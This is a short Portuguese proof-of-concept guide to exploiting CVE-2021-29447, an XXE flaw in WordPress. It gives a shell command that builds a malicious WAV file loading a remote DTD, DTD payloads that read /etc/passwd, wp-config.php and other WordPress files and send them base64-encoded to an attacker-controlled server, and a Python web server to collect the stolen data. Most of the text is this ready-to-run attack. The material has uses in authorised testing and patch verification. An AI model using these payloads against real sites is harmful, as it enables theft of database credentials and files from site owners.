
Exploração de prova de conceito para CVE-2021-29447, uma vulnerabilidade XXE no WordPress permitindo divulgação arbitrária de arquivos e SSRF via arquivos WAV manipulados.
Divulgação Arbitrária de Arquivos: o conteúdo de qualquer arquivo no sistema de arquivos do host poderia ser recuperado, por exemplo, wp-config.php que contém dados sensíveis como credenciais de banco de dados. Server-Side Request Forgery (SSRF): requisições HTTP poderiam ser feitas em nome da instalação do WordPress. Dependendo do ambiente, isso pode ter um sério impacto. Explorando a vulnerabilidade
Um site WordPress afetado por esta vulnerabilidade foi identificado no processo de enumeração com a ajuda da ferramenta wpscan.

É muito fácil, no seu console bash
nano poc.wav
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
Na sua máquina atacante, crie um dtd com o código a ser executado no servidor web.
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
Nota: para ler arquivos do WordPress use a sintaxe "../WP-FILE.php"
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
Hospede um servidor python no diretório dos arquivos (python3 -m http.server 8081)